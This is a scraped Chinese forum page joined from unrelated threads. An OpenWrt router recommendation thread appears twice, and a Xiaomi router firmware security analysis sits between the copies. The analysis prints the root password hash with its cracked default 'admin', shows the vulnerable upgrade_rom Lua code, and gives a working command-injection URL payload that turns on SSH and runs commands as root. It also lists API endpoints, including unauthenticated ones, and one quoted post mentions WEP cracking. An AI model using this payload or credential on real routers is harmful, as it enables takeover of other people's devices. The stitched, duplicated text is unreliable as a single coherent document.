安卓系统和openwrt系统哪个做路由器刷openwrt更好
点击联系发帖人
时间:2017-11-20 09:37
&主题:推荐一个支持openwrt的路由器吧?呵呵。谢谢。
泡网分: 31.094
帖子: 1941
注册: 2002年10月
推荐一个支持openwrt的路由器吧?呵呵。谢谢。
微信扫一扫分享
&浏览:1300&&回帖:13 &&
泡网分: 4.894
帖子: 2850
注册: 2013年12月
MTK方案的最多,功能最全,可玩性最高。几十到几百都有。我在用一个inet的和一个魔豆
本帖由安卓客户端发布
泡网分: 21.167
帖子: 1366
注册: 2005年10月
裴讯k2啊,免费
本帖由 无忌论坛V3.1.0 iPhone6plus iOS9.3.5 客户端发布
泡网分: 42.557
精华: 1帖子: 8244
注册: 2007年04月
zieous 发表于
无线路由也DIY
07:51:25A-A+
家里用的Linksys的WRT54G,性能稳定,基于web的设置界面也非常好用。实际上WRT54G(大部分Linksys产品也如此)采用Linux为操作系统的。而限于Gnu版权限制,它需要公开系统源码。所以在Linksys的网站上一般产品都有一个链接,可以下载整个系统的源码。既然是Linux,那么它的预装的bootloader选择就不多了,一般都是redboot。而Redboot是有固件下载升级支持的。于是很快有人就开始自己改Linksys的系统固件,再通过redboot等办法装到路由上。OpenWRT就是几个网上流行的后市场系统固件包之一。既然叫Open,它自然就是公开源码的而且是免费的。
OpenWRT最初是面对Linksys的家用无线路由的,这个从它的名字上也看得出来,不过后来渐渐扩展到其他牌子的家用无线路由上了。这里有一个详细列表,可以从中看到OpenWRT是否支持您的家用无线路由。
刷了OpenWRT的无线路有能够干什么呢?首先它成了一台全须全尾的Linux机(当然说全须全尾是指linux内核部分,当然没有Xwindow部分--有了也没法接 ...不懂怎么刷openwrt。。。求教
linksys wrvs4400n
泡网分: 11.317
帖子: 1097
注册: 2006年09月
chm128256 发表于
150以内买华为HG255D吧,还可以的。~~~~~~~~~~~~~
这个路由器好像都买不到全新的货啦,网上都是改的货,不知道质量如何阿!担心,有没有可靠的货推荐呢?华为新出的有没有啥推荐的呢?谢谢啦!
泡网分: 39.045
帖子: 6565
注册: 2002年09月
无线路由也DIY
07:51:25A-A+
家里用的Linksys的WRT54G,性能稳定,基于web的设置界面也非常好用。实际上WRT54G(大部分Linksys产品也如此)采用Linux为操作系统的。而限于Gnu版权限制,它需要公开系统源码。所以在Linksys的网站上一般产品都有一个链接,可以下载整个系统的源码。既然是Linux,那么它的预装的bootloader选择就不多了,一般都是redboot。而Redboot是有固件下载升级支持的。于是很快有人就开始自己改Linksys的系统固件,再通过redboot等办法装到路由上。OpenWRT就是几个网上流行的后市场系统固件包之一。既然叫Open,它自然就是公开源码的而且是免费的。
OpenWRT最初是面对Linksys的家用无线路由的,这个从它的名字上也看得出来,不过后来渐渐扩展到其他牌子的家用无线路由上了。这里有一个详细列表,可以从中看到OpenWRT是否支持您的家用无线路由。
刷了OpenWRT的无线路有能够干什么呢?首先它成了一台全须全尾的Linux机(当然说全须全尾是指linux内核部分,当然没有Xwindow部分--有了也没法接显示器阿,至于内核模块和应用,看你有多大空间自己装了),你可以架设文件服务器,甚至打印机服务器等。路由方面,可以有路由/交换,虚拟局网,iptables防火墙,WDS无线路桥等等诸般扩展功能。还有就是可以做成一个无线网的监视器,专事监听,用来破解周围的无线接入点的WEP。
cchere.net
OpenWRT也有自己的系统设置网页,和Linksys原装的类似,都很好懂。另外OpenWRT会保留您原先的各种设置。原来的路由地址也保留,这样再进新的系统设置网页就用同一地址就好了。同样这网页上也有固件升级的选项。这样如果玩OpenWRT玩厌了,您还可以再把Linksys的固件刷回去。
当然如果只有设置网页作为界面,咱们也没必要刷机了。OpenWRT可以让您通过SSH进入,直接亲密接触Linux的终端界面。刷机后第一次进入先用 root来telnet。进入后系统会要求设置root的口令(默认值是没有口令)。设好退出后,telnet就从此被关闭了,以后将只能用ssh进入。
cchere.net
在OpenWRT网站上还有整个开发树的下载,可以下载来自己改Linux内核。该好后make包装成您自己的无线路由固件。
OpenWRT不是仅有的无线路由开源项目。DD-WRT是另一个选择,用它可以使廉价的Linksys的WRT54G成为一些昂贵的专业无线路有的替代品,提供很多高级功能,比如radius,网络监控等等。
(新浪博客提示:此博文已经过自动调整,以便在移动设备上查看)
泡网分: 39.045
帖子: 6565
注册: 2002年09月
yw1213 发表于
部署Go agent,翻墙用?这到是一个好办法
泡网分: 30.83
帖子: 10855
注册: 2006年04月
zieous 发表于
支持Openwrt有什么好处?部署Go agent,翻墙用?
泡网分: 39.045
帖子: 6565
注册: 2002年09月
支持Openwrt有什么好处?
泡网分: 8.159
注册: 2009年06月
150以内买华为HG255D吧,还可以的。
技术工人 发表于
同求,要求不要太高端了,150元以下的有没有什么产品?
泡网分: 11.317
帖子: 1097
注册: 2006年09月
同求,要求不要太高端了,150元以下的有没有什么产品?
泡网分: 15.391
注册: 2007年03月
参考官方的硬件列表应该没错
http://wiki.openwrt.org/toh/start
目测目前最合适的是TPLink的WDR4310,不过我自己没用过,不行别找我
据说今天是路由器的ARM年,也可以考虑等待 本帖最后由 youngxq 于
20:47 编辑
泡网分: 10.308
帖子: 8721
注册: 2012年02月
wndr3700v2
不到400块钱能买到的最高配置:
cpu: ar71xx 680MHz
wlan: 2.4GHz(2x2), 5Ghz(2x1)
switch: 1Gbps x 6 (实际只有5个)
emmc: 16MB
唯一的缺点是,天线内置,5G可以引出来,2.4G需要大改才能引。
泡网分: 29.544
帖子: 3635
注册: 2004年04月
用ar芯片的支持,最简单买个便宜的tp,甚至迅捷,水星都可以。
&版权所有:&&&&红米手机 &
高级手机控
扫码下载App一键签到 升级加速
基于OpenWRT智能路由器固件的分析思路探讨
&来自老版论坛
扫一扫!手机看帖更爽
什么是OpenWrt
OpenWr是一个适用于路由器的Linux发行版,和其他Linux发行版一样,它也内置了包管理工具,你可以从一个软件仓库里直接安装软件。OpenWrt可以用在所有需要嵌入式Linux的地方,它有众多功能,比如SSH服务器,VPN,甚至是BitTorrent客户端。
OpenWrt并不适合所有人,大多数人对自己的路由器自带固件已经很满意了,但许多高级用户则会使用像DD-WRT这样的嵌入式替代方案。但OpenWrt更灵活——本质上它是一个可安装于各种路由器的嵌入式Linux系统。OpenWrt有一个web交互界面,但如果你需要的只是一个有更多特性的web界面,还有其他一些路由器固件的替代方案会让你感觉更好。和DD-WRT一样,OpenWrt基于Linux而且比一些路由器自带的固件更稳定,要知道有些路由器一旦遇到大量连接就会比较让人着急了。
目前国内基于OpenWrt二次开发的路由器,小米路由器、极路由、迅雷路由、如意云 等
小米路由器固件介绍
小米MIWIFI系统固件下载 htt#p:#/#/#/miwifi_download.htm
小米路由器ROM固件,BCM 4709 ARM架构,采用OpenWRT为基础二次开发,r1d.bin稳定版文件大小:43.6 MB,内部名称brcm4709_hdd.bin猜的。r1d_beta.bin开发版文件大小:36.0 MB,似乎官网提供的是不完整包,需要update更新。
以下内容均为解压0.4.58稳定版固件后分析编写,日编译。
1、检测系统弱口令
解压固件找到shadow文件查看,发现管理员账户只有root一个
root:$1$mGrY9Gpt$vT7nVZg7fYnJ3rI5.UvJP0:99:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
对root的hash解密发现路由既然用弱root密码,这是稳定版吗?隐约感觉有些危险的气息。
秒破root密码为:admin
继续跟一下这个默认密码问题,发现似乎在手机端或web端访问hello页面初始化路由的时候就已经固化了这个密码,稳定版如果这样弄我觉得没必要区分开发版和稳定版了。 都可以做为开发模式使用了,小米路由团队发布的时候就没考虑好这个问题?而且这个默认密码也太弱了,随时都可能发生危险。
2、检测系统lua脚本执行函数
对关键字“Exec”的执行函数,审计可以发现\usr\lib\lua\luci\controller\api\xqsystem.lua存在一处命令执行漏洞。XQFunction.forkExec(string.format(&/usr/sbin/crontab_rom.sh %s %s %s&, url, hash, filesize))中URL参数无过滤带入执行。攻击者可构造“api/xqsystem/upgrade_rom?url=命令1;命令2;命令3”执行任意命令,由于Web是用root用户身份运行,恶意语句会以root身份执行任意命令。
已知利用方式,开启SSH,返回{&code&:0}执行成功。
首先用浏览器登录路由器管理平台,浏览器地址栏里显示这样的链接:192.168.31.1/cgi-bin/luci/;stok=f658e40eb863b7b23e89fb/web/home
将链接中的 /web/home 替换成 /api/xqsystem/upgrade_rom?url=%3Bnvram+set+ssh_en%3D1%3Bnvram+commit%3B%2Fetc%2Finit.d%2Fdropbear+start%3B
-- 直接执行升级脚本function upgradeRom()& & local XQFunction = require(&mon.XQFunction&)& & local XQSysUtil = require(&xiaoqiang.util.XQSysUtil&)& & local url = LuciHttp.formvalue(&url&)& & local filesize = tostring(LuciHttp.formvalue(&filesize&))& & local hash = tostring(LuciHttp.formvalue(&hash&))& & local result = {}& & local code = 0& & if XQSysUtil.checkBeenUpgraded() then& && &&&code = 1577& & elseif XQSysUtil.isUpgrading() then& && &&&code = 1568& & end& & result[&code&] = code& & if code ~= 0 then& && & result[&msg&] = XQErrorUtil.getErrorMessage(code)& & end& & LuciHttp.write_json(result)& & if code == 0 then& && &&&XQFunction.sysLock()& && &&&if url and filesize and hash then& && && && &XQFunction.forkExec(string.format(&/usr/sbin/crontab_rom.sh %s %s %s&, url, hash, filesize))& && &&&else& && && && &XQFunction.forkExec(&/usr/sbin/crontab_rom.sh&)& && &&&end& & endend
[color=rgb(51, 102, 153) !important]复制代码
3、分析路由系统文件
对于系统文件的分析话题太大,我只是粗略分析一些文件的作用。抛砖引玉,这里我整理一些lua、sh等系统文件,大家可以自己用文本编辑器打开查看源码,可以通过内容搜索lua、sh脚本审计是否存在漏洞。如果想深入要反编译*.so动态链接库文件等系统文件,可以使用IDA Pro。
开放API接口文件列表:
& & index.lua 预留
& & xqdatacenter.lua 数据中心
& & xqnetdetect.lua 网络状态检测
& & xqnetwork.lua 网络设置
& & xqpassport.lua 登陆接口
& & xqsmarthome.lua 智能家居
& & xqsystem.lua 系统设置
系统使用的类文件列表:
│&&XQEquipment.lua
│&&XQLog.lua
│&&XQPreference.lua
│&&XQPushHelper.lua
│&&XQVersion.lua
├─common
│& && &XQConfigs.lua
│& && &XQFunction.lua
& && &&&XQCacheUtil.lua
& && &&&XQCryptoUtil.lua
& && &&&XQDBUtil.lua
& && &&&XQDeviceUtil.lua
& && &&&XQDownloadUtil.lua
& && &&&XQErrorUtil.lua
& && &&&XQHttpUtil.lua
& && &&&XQLanWanUtil.lua
& && &&&XQMitvUtil.lua
& && &&&XQNetUtil.lua
& && &&&XQQoSUtil.lua
& && &&&XQSecureUtil.lua
& && &&&XQSysUtil.lua
& && &&&XQUPnPUtil.lua
& && &&&XQVPNUtil.lua
& && &&&XQWifiUtil.lua
系统使用的一些程序及脚本
/usr/share/xiaoqiang/public.pem
/usr/sbin/webinitrdr.monitor
/usr/sbin/waitctlc
/usr/sbin/uhbn
/usr/sbin/traffic.lua
/usr/sbin/tftpupgrade
/usr/sbin/syslog-ng.helper
/usr/sbin/sysapi.firewall
/usr/sbin/sysapi
/usr/sbin/supervisord
/usr/sbin/stopallmonitor.sh
/usr/sbin/ntpsetclock
/usr/sbin/noflushd
/usr/sbin/networkdt
/usr/sbin/macfilterctl
/usr/sbin/log_collection.sh
/usr/sbin/iptaccount.set.firewall
/usr/sbin/initmacfilterctl
/usr/sbin/gettraffic.lua
/usr/sbin/getstat.lua
/usr/sbin/fixnvram
/usr/sbin/firewall.webinitrdr
/usr/sbin/fanctrl.sh
/usr/sbin/fan_tmp.sh
/usr/sbin/crontab_rom.sh
/usr/sbin/cpureset
/usr/sbin/cpulimit_daemon.sh
/usr/sbin/config_pre_ota.sh
/usr/sbin/config_post_ota.sh
/usr/sbin/config_collection.sh
/usr/sbin/checkupgrade.lua
/usr/sbin/addnewmac
/usr/lib/lua/sysapi/traffic.lua
/usr/lib/lua/json.lua
/userdisk/userdisk.readme
/lib/config_post_ota/macfilter_config_post_ota.sh
/etc/init.d/webinitrdr
/etc/init.d/traffic.counter
/etc/init.d/tftpboot
/etc/init.d/resetbutton
/etc/init.d/noflushd
/etc/init.d/networkdt
/etc/init.d/fantmp
/etc/init.d/cpulimit
/etc/config/macfilter
/etc/config/fanctrl
/bin/safeflash.sh
/bin/mkxqimage
/bin/flash_check.sh
/bin/flash.sh
/bin/cpulimit
系统内部文件
/etc/config/account
/etc/config/push
/etc/config/xiaoqiang
/etc/xqDb sqlite数据库
/usr/lib/lua/rc4.lua
/usr/lib/lua/service/util/ServiceErrorUtil.lua
/usr/lib/lua/sha1.lua
/usr/lib/lua/slaxdom.lua
/usr/lib/lua/slaxml.lua
/usr/lib/lua/xiaoqiang/common/XQConfigs.lua
/usr/lib/lua/xiaoqiang/common/XQFunction.lua
/usr/lib/lua/xiaoqiang/util/XQCacheUtil.lua
/usr/lib/lua/xiaoqiang/util/XQCryptoUtil.lua
/usr/lib/lua/xiaoqiang/util/XQDBUtil.lua
/usr/lib/lua/xiaoqiang/util/XQDeviceUtil.lua
/usr/lib/lua/xiaoqiang/util/XQDownloadUtil.lua
/usr/lib/lua/xiaoqiang/util/XQErrorUtil.lua
/usr/lib/lua/xiaoqiang/util/XQHttpUtil.lua
/usr/lib/lua/xiaoqiang/util/XQLanWanUtil.lua
/usr/lib/lua/xiaoqiang/util/XQMitvUtil.lua
/usr/lib/lua/xiaoqiang/util/XQNetUtil.lua
/usr/lib/lua/xiaoqiang/util/XQQoSUtil.lua
/usr/lib/lua/xiaoqiang/util/XQSecureUtil.lua
/usr/lib/lua/xiaoqiang/util/XQSysUtil.lua
/usr/lib/lua/xiaoqiang/util/XQUPnPUtil.lua
/usr/lib/lua/xiaoqiang/util/XQVPNUtil.lua
/usr/lib/lua/xiaoqiang/util/XQWifiUtil.lua
/usr/lib/lua/xiaoqiang/XQEquipment.lua
/usr/lib/lua/xiaoqiang/XQLog.lua
/usr/lib/lua/xiaoqiang/XQPreference.lua
/usr/lib/lua/xiaoqiang/XQPushHelper.lua
/usr/lib/lua/xiaoqiang/XQVersion.lua
/usr/lib/lua/xqcrypto.so
/usr/lib/lua/xssFilter.lua
/usr/sbin/feedPush
/usr/share/xiaoqiang/oui.zip
4、分析路由系统开放API接口
由于OpenWRT的Web控制都是使用lua脚本编写,只要拿到固件解压后查看lua都是源码,所以如果大家想写程序调用路由API的话,等待官方出文档肯定都是慢半拍的。所以如果需要的话可以自己阅读代码然后根据要求自己写。快速搞定哈!
怎么找漏洞?API有些是管理员调用,有一些是不需要管理员就可以使用的。小米路由器0x09的是不需要登录就可以使用的API,具体细节可以参考:\usr\lib\lua\luci\dispatcher.lua,搜索关键字“track.flag”。这只是越权调用API,当然如果你有耐心可以每个函数都看看没准还能发一些高危漏洞。
r1d\usr\lib\lua\luci\controller\api\xqdatacenter.lua (8 hits)entry({&api&, &xqdatacenter&}, firstchild(), _(&&), 300)entry({&api&, &xqdatacenter&, &request&}, call(&tunnelRequest&), _(&&), 301)entry({&api&, &xqdatacenter&, &identify_device&}, call(&identifyDevice&), _(&&), 302, 0x08)entry({&api&, &xqdatacenter&, &download&}, call(&download&), _(&&), 303)entry({&api&, &xqdatacenter&, &upload&}, call(&upload&), _(&&), 304)entry({&api&, &xqdatacenter&, &thumb&}, call(&getThumb&), _(&&), 305)entry({&api&, &xqdatacenter&, &device_id&}, call(&getDeviceId&), _(&&), 306)entry({&api&, &xqdatacenter&, &check_file_exist&}, call(&checkFileExist&), _(&&), 307)r1d\usr\lib\lua\luci\controller\api\xqnetdetect.lua (6 hits)entry({&api&, &xqnetdetect&}, firstchild(), _(&&), 350)entry({&api&, &xqnetdetect&, &wan_status&}, call(&getWanStatus&), _(&&), 351, 0x01)entry({&api&, &xqnetdetect&, &sys_info&}, call(&getSysInfo&), (&&), 352, 0x01)entry({&api&, &xqnetdetect&, &ping_test&}, call(&pingTest&), (&&), 353, 0x01)entry({&api&, &xqnetdetect&, &detect&}, call(&systemDiagnostics&), (&&), 354, 0x01)entry({&api&, &xqnetdetect&, &sys_status&}, call(&systemStatus&), (&&), 355, 0x01)r1d\usr\lib\lua\luci\controller\api\xqnetwork.lua (30 hits)entry({&api&, &xqnetwork&}, firstchild(), (&&), 200)entry({&api&, &xqnetwork&, &wifi_status&}, call(&getWifiStatus&), (&&), 201)entry({&api&, &xqnetwork&, &wifi_detail&}, call(&getWifiInfo&), (&&), 202)entry({&api&, &xqnetwork&, &wifi_detail_all&}, call(&getAllWifiInfo&), (&&), 202)entry({&api&, &xqnetwork&, &wifi_connect_devices&}, call(&getWifiConDev&), (&&), 203)entry({&api&, &xqnetwork&, &wifi_txpwr_channel&}, call(&getWifiChTx&), (&&), 204)-- entry({&api&, &xqnetwork&, &set_wifi_txpwr_channel&}, call(&setWifiChTx&), (&&), 205)entry({&api&, &xqnetwork&, &set_wifi_txpwr&}, call(&setWifiTxpwr&), (&&), 205)entry({&api&, &xqnetwork&, &wifi_up&}, call(&turnOnWifi&), (&&), 206)entry({&api&, &xqnetwork&, &wifi_down&}, call(&shutDownWifi&), (&&), 207)entry({&api&, &xqnetwork&, &set_wifi&}, call(&setWifi&), (&&), 208)--entry({&api&, &xqnetwork&, &get_scan_list&}, call(&get_scan_list&), (&&), 209, true)--entry({&api&, &xqnetwork&, &wifi_ctl_scan&}, call(&wifi_ctl_scan&), (&&), 210)--entry({&api&, &xqnetwork&, &get_bridge&}, call(&get_bridge&), (&&), 211, true)--entry({&api&, &xqnetwork&, &set_bridge&}, call(&set_bridge&), (&&), 212)entry({&api&, &xqnetwork&, &lan_info&}, call(&getLanInfo&), (&&), 213)entry({&api&, &xqnetwork&, &wan_info&}, call(&getWanInfo&), (&&), 214)entry({&api&, &xqnetwork&, &lan_dhcp&}, call(&getLanDhcp&), (&&), 215)entry({&api&, &xqnetwork&, &wan_down&}, call(&wanDown&), (&&), 216)entry({&api&, &xqnetwork&, &wan_up&}, call(&wanUp&), (&&), 217)entry({&api&, &xqnetwork&, &check_wan_type&}, call(&getAutoWanType&), (&&), 218, 0x08)entry({&api&, &xqnetwork&, &wan_statistics&}, call(&getWanStatistics&), (&&), 219)entry({&api&, &xqnetwork&, &devices_statistics&}, call(&getDevsStatistics&), (&&), 220)entry({&api&, &xqnetwork&, &device_statistics&}, call(&getDevStatistics&), (&&), 221)entry({&api&, &xqnetwork&, &set_lan_ip&}, call(&setLanIp&), (&&), 222)entry({&api&, &xqnetwork&, &set_wan&}, call(&setWan&), (&&), 223, 0x08)entry({&api&, &xqnetwork&, &set_lan_dhcp&}, call(&setLanDhcp&), (&&), 224)entry({&api&, &xqnetwork&, &mac_clone&}, call(&setWanMac&), (&&), 225)entry({&api&, &xqnetwork&, &set_all_wifi&}, call(&setAllWifi&), (&&), 226)entry({&api&, &xqnetwork&, &avaliable_channels&}, call(&getChannels&), (&&), 227)r1d\usr\lib\lua\luci\controller\api\xqpassport.lua (10 hits)entry({&api&, &xqpassport&}, firstchild(), (&&), 400)entry({&api&, &xqpassport&, &login&}, call(&passportLogin&), (&&), 401, 0x01)entry({&api&, &xqpassport&, &userInfo&}, call(&getUserInfo&), (&&), 402)entry({&api&, &xqpassport&, &rigister&}, call(&routerRegister&), (&&), 405, 0x01)entry({&api&, &xqpassport&, &binded&}, call(&getBindInfo&), (&&), 406, 0x01)entry({&api&, &xqpassport&, &plugin_list&}, call(&pluginList&), (&&), 407)entry({&api&, &xqpassport&, &plugin_enable&}, call(&pluginEnable&), (&&), 408)entry({&api&, &xqpassport&, &plugin_disable&}, call(&pluginDisable&), (&&), 409)entry({&api&, &xqpassport&, &plugin_detail&}, call(&pluginDetail&), (&&), 410)entry({&api&, &xqpassport&, &unbound&}, call(&unboundRouter&), (&&), 411)r1d\usr\lib\lua\luci\controller\api\xqsmarthome.lua (5 hits)entry({&api&, &xqsmarthome&}, firstchild(), _(&&), 500)entry({&api&, &xqsmarthome&, &request&}, call(&tunnelSmartHomeRequest&), _(&&), 501)entry({&api&, &xqsmarthome&, &request_smartcontroller&}, call(&tunnelSmartControllerRequest&), _(&&), 502)entry({&api&, &xqsmarthome&, &request_miio&}, call(&tunnelMiioRequest&), _(&&), 503)entry({&api&, &xqsmarthome&, &request_mitv&}, call(&requestMitv&), _(&&), 504)r1d\usr\lib\lua\luci\controller\api\xqsystem.lua (71 hits)entry({&api&, &xqsystem&}, firstchild(), (&&), 100)entry({&api&, &xqsystem&, &login&}, call(&actionLogin&), (&&), 109, 0x08)entry({&api&, &xqsystem&, &init_info&}, call(&getInitInfo&), (&&), 101, 0x09)entry({&api&, &xqsystem&, &token&}, call(&getToken&), (&&), 103, 0x08)entry({&api&, &xqsystem&, &set_inited&}, call(&setInited&), (&&), 103, 0x08)entry({&api&, &xqsystem&, &system_info&}, call(&getSysInfo&), (&&), 104, 0x01)entry({&api&, &xqsystem&, &set_name_password&}, call(&setPassword&), (&&), 105)entry({&api&, &xqsystem&, &check_rom_update&}, call(&checkRomUpdate&), (&&), 106)entry({&api&, &xqsystem&, &lan_wan&}, call(&getLanWanSta&), (&&), 106)entry({&api&, &xqsystem&, &flash_rom&}, call(&flashRom&), (&&), 108)entry({&api&, &xqsystem&, &router_name&}, call(&getRouterName&), (&&), 110)entry({&api&, &xqsystem&, &set_router_name&}, call(&setRouterName&), (&&), 111)entry({&api&, &xqsystem&, &device_list&}, call(&getDeviceList&), (&&), 112)entry({&api&, &xqsystem&, &set_device_nickname&}, call(&setDeviceNickName&), (&&), 113)entry({&api&, &xqsystem&, &internet_connect&}, call(&isInternetConnect&), (&&), 114)entry({&api&, &xqsystem&, &upload_rom&}, call(&uploadRom&), (&&), 115)entry({&api&, &xqsystem&, &get_languages&}, call(&getLangList&), (&&), 118, 0x01)entry({&api&, &xqsystem&, &get_main_language&}, call(&getMainLang&), (&&), 119, 0x01)entry({&api&, &xqsystem&, &set_language&}, call(&setLang&), (&&), 120)entry({&api&, &xqsystem&, &upload_log&}, call(&uploadLogFile&), (&&), 124)entry({&api&, &xqsystem&, &backup_config&}, call(&uploadConfigFile&), (&&), 125)entry({&api&, &xqsystem&, &config_recovery&}, call(&configRecovery&), (&&), 126)entry({&api&, &xqsystem&, &router_init&}, call(&setRouter&), (&&), 126, 0x08)entry({&api&, &xqsystem&, &information&}, call(&getAllInfo&), (&&), 127)entry({&api&, &xqsystem&, &status&}, call(&getStatusInfo&), (&&), 128)entry({&api&, &xqsystem&, &count&}, call(&getConDevCount&), (&&), 129)entry({&api&, &xqsystem&, &reboot&}, call(&reboot&), (&&), 130)entry({&api&, &xqsystem&, &reset&}, call(&reset&), (&&), 131)entry({&api&, &xqsystem&, &passport_bind_info&}, call(&getPassportBindInfo&), (&&), 132, 0x01)entry({&api&, &xqsystem&, &set_passport_bound&}, call(&setPassportBound&), (&&), 133, 0x08)entry({&api&, &xqsystem&, &get_sys_avg_load&}, call(&getSysAvgLoad&), (&&), 134)entry({&api&, &xqsystem&, &set_mac_filter&}, call(&setMacFilter&), (&&), 135)entry({&api&, &xqsystem&, &renew_token&}, call(&renewToken&), (&&), 136)entry({&api&, &xqsystem&, &remove_passport_info&}, call(&removePassportBindInfo&), (&&), 137)entry({&api&, &xqsystem&, &upgrade_rom&}, call(&upgradeRom&), (&&), 138)entry({&api&, &xqsystem&, &wps&}, call(&openWps&), (&&), 139, 0x08)entry({&api&, &xqsystem&, &wps_status&}, call(&getWpsStatus&), (&&), 140)entry({&api&, &xqsystem&, &stop_nginx&}, call(&stopNginx&), (&&), 141)entry({&api&, &xqsystem&, &check_router_name_pending&}, call(&checkRouterNamePending&), (&&), 142)entry({&api&, &xqsystem&, &clear_router_name_pending&}, call(&clearRouterNamePending&), (&&), 143)entry({&api&, &xqsystem&, &web_url&}, call(&redirectUrl&), (&&), 144)entry({&api&, &xqsystem&, &start_nginx&}, call(&startNginx&), (&&), 145)entry({&api&, &xqsystem&, &nginx&}, call(&nginxCacheStatus&), (&&), 146)entry({&api&, &xqsystem&, &flash_status&}, call(&flashStatus&), (&&), 147, 0x01)entry({&api&, &xqsystem&, &upgrade_status&}, call(&upgradeStatus&), (&&), 148, 0x0d)entry({&api&, &xqsystem&, &create_sandbox&}, call(&createSandbox&), (&&), 149)entry({&api&, &xqsystem&, &is_sandbox_created&}, call(&isSandboxCreated&), (&&), 150)entry({&api&, &xqsystem&, &mount_things&}, call(&mountThings&), (&&), 151)entry({&api&, &xqsystem&, &umount_things&}, call(&umountThings&), (&&), 152)entry({&api&, &xqsystem&, &are_things_mounted&}, call(&areThingsMounted&), (&&), 153)entry({&api&, &xqsystem&, &start_dropbear&}, call(&startDropbear&), (&&), 154)entry({&api&, &xqsystem&, &stop_dropbear&}, call(&stopDropbear&), (&&), 155)entry({&api&, &xqsystem&, &is_dropbear_started&}, call(&isDropbearStarted&), (&&), 156)entry({&api&, &xqsystem&, &main_status_for_app&}, call(&mainStatusForApp&), (&&), 157)entry({&api&, &xqsystem&, &mode&}, call(&getMacfilterMode&), (&&), 158)entry({&api&, &xqsystem&, &set_mode&}, call(&setMacfilterMode&), (&&), 159)entry({&api&, &xqsystem&, &cancel&}, call(&cancelUpgrade&), (&&), 160, 0x0d)entry({&api&, &xqsystem&, &shutdown&}, call(&shutdown&), (&&), 161)entry({&api&, &xqsystem&, &upnp&}, call(&upnpList&), (&&), 162)entry({&api&, &xqsystem&, &upnp_switch&}, call(&upnpSwitch&), (&&), 163)entry({&api&, &xqsystem&, &app_limit&}, call(&appLimit&), (&&), 164)entry({&api&, &xqsystem&, &app_limit_switch&}, call(&appLimitSwitch&), (&&), 165)entry({&api&, &xqsystem&, &set_app_limit&}, call(&setAppLimit&), (&&), 166)entry({&api&, &xqsystem&, &vpn&}, call(&vpnInfo&), (&&), 167)entry({&api&, &xqsystem&, &vpn_status&}, call(&vpnStatus&), (&&), 168)entry({&api&, &xqsystem&, &vpn_switch&}, call(&vpnSwitch&), (&&), 169)entry({&api&, &xqsystem&, &set_vpn&}, call(&setVpn&), (&&), 170)entry({&api&, &xqsystem&, &device_mac&}, call(&getDeviceMacaddr&), (&&), 171, 0x01)entry({&api&, &xqsystem&, &wps_cancel&}, call(&stopWps&), (&&), 172)entry({&api&, &xqsystem&, &detection_ts&}, call(&getDetectionTimestamp&), (&&), 173)entry({&api&, &xqsystem&, &wifi_log&}, call(&getWifiLog&), (&&), 174)
[color=rgb(51, 102, 153) !important]复制代码
[color=rgb(51, 102, 153) !important]
扫描二维码,手机查看本帖
·来自老版论坛
我就是一菜鸟,表示根本看不懂{:2_27:}
·来自老版论坛
密码是跟着管理密码变化的,估计楼主的管理密码是admin
·来自老版论坛
没别的意思,只是让官方注意下安全,如果安全输在了起点上,电脑再安全都没用
哦,别介意只是随便说说,最新开发版0.9.2已经修复ssh了
·来自老版论坛
不明觉厉呀。。。这才是真的技术贴呀!
·来自老版论坛
你想让官方回复什么,人家量产版故意关闭了ssh,根本就没想让用户涉足这部分,so。。。 ...
没别的意思,只是让官方注意下安全,如果安全输在了起点上,电脑再安全都没用
·来自老版论坛
有58的bin吗?我手贱升级了,找不到降回去的文件了。
有的~/s/1mg5aiZe
·来自老版论坛
用u盘降级到58~小米不地道~
有58的bin吗?我手贱升级了,找不到降回去的文件了。
·来自老版论坛
很牛的分享~!!!!!!
·来自老版论坛
ssh root登录对于玩家来说不是问题,官方是无法封堵的,极路由的所以版本都可轻松打开ssh,小米路由也不会 ...
我是听说最新开发版给堵上了。。。
·来自老版论坛
技术贴,必回!!!!!!!
·来自老版论坛
强,就这样被破了,晚上回去试试
·来自老版论坛
隐约一股内部人士的味道飘了过来
·来自老版论坛
希望大神留步,常来反映。我们可以加个群 没事给我们科普一下
你以上内容我估计我就看懂了10%
·来自老版论坛
58据说是可以的,可以现在已经59了...
用u盘降级到58~小米不地道~
·来自老版论坛
不是同一人的帖子……
/thread--1.html
wooyun.org/bugs/wooyun- ...
58据说是可以的,可以现在已经59了...
·来自老版论坛
不是同一人的帖子……
/thread--1.html
wooyun.org/bugs/wooyun-
·来自老版论坛
同求打开SSH的方法!!!!
前面的帖子有了,自己看看去。这篇应该是乌云上面的扩展吧~
小米路由团队的开发水平实在不敢恭维
·来自老版论坛
最新版本怎么打开呢?
按照iPhone越狱的规矩,不提供测试版的越狱,防止漏洞被堵上,所以要等小米正式版推出新版后才能公布方法。
·来自老版论坛
我就是一菜鸟,表示根本看不懂{:6_215:}
·来自老版论坛
强,就这样被破了,晚上回去试试
京ICP证110507号 京ICP备号}
泡网分: 31.094
帖子: 1941
注册: 2002年10月
推荐一个支持openwrt的路由器吧?呵呵。谢谢。
微信扫一扫分享
&浏览:1300&&回帖:13 &&
泡网分: 4.894
帖子: 2850
注册: 2013年12月
MTK方案的最多,功能最全,可玩性最高。几十到几百都有。我在用一个inet的和一个魔豆
本帖由安卓客户端发布
泡网分: 21.167
帖子: 1366
注册: 2005年10月
裴讯k2啊,免费
本帖由 无忌论坛V3.1.0 iPhone6plus iOS9.3.5 客户端发布
泡网分: 42.557
精华: 1帖子: 8244
注册: 2007年04月
zieous 发表于
无线路由也DIY
07:51:25A-A+
家里用的Linksys的WRT54G,性能稳定,基于web的设置界面也非常好用。实际上WRT54G(大部分Linksys产品也如此)采用Linux为操作系统的。而限于Gnu版权限制,它需要公开系统源码。所以在Linksys的网站上一般产品都有一个链接,可以下载整个系统的源码。既然是Linux,那么它的预装的bootloader选择就不多了,一般都是redboot。而Redboot是有固件下载升级支持的。于是很快有人就开始自己改Linksys的系统固件,再通过redboot等办法装到路由上。OpenWRT就是几个网上流行的后市场系统固件包之一。既然叫Open,它自然就是公开源码的而且是免费的。
OpenWRT最初是面对Linksys的家用无线路由的,这个从它的名字上也看得出来,不过后来渐渐扩展到其他牌子的家用无线路由上了。这里有一个详细列表,可以从中看到OpenWRT是否支持您的家用无线路由。
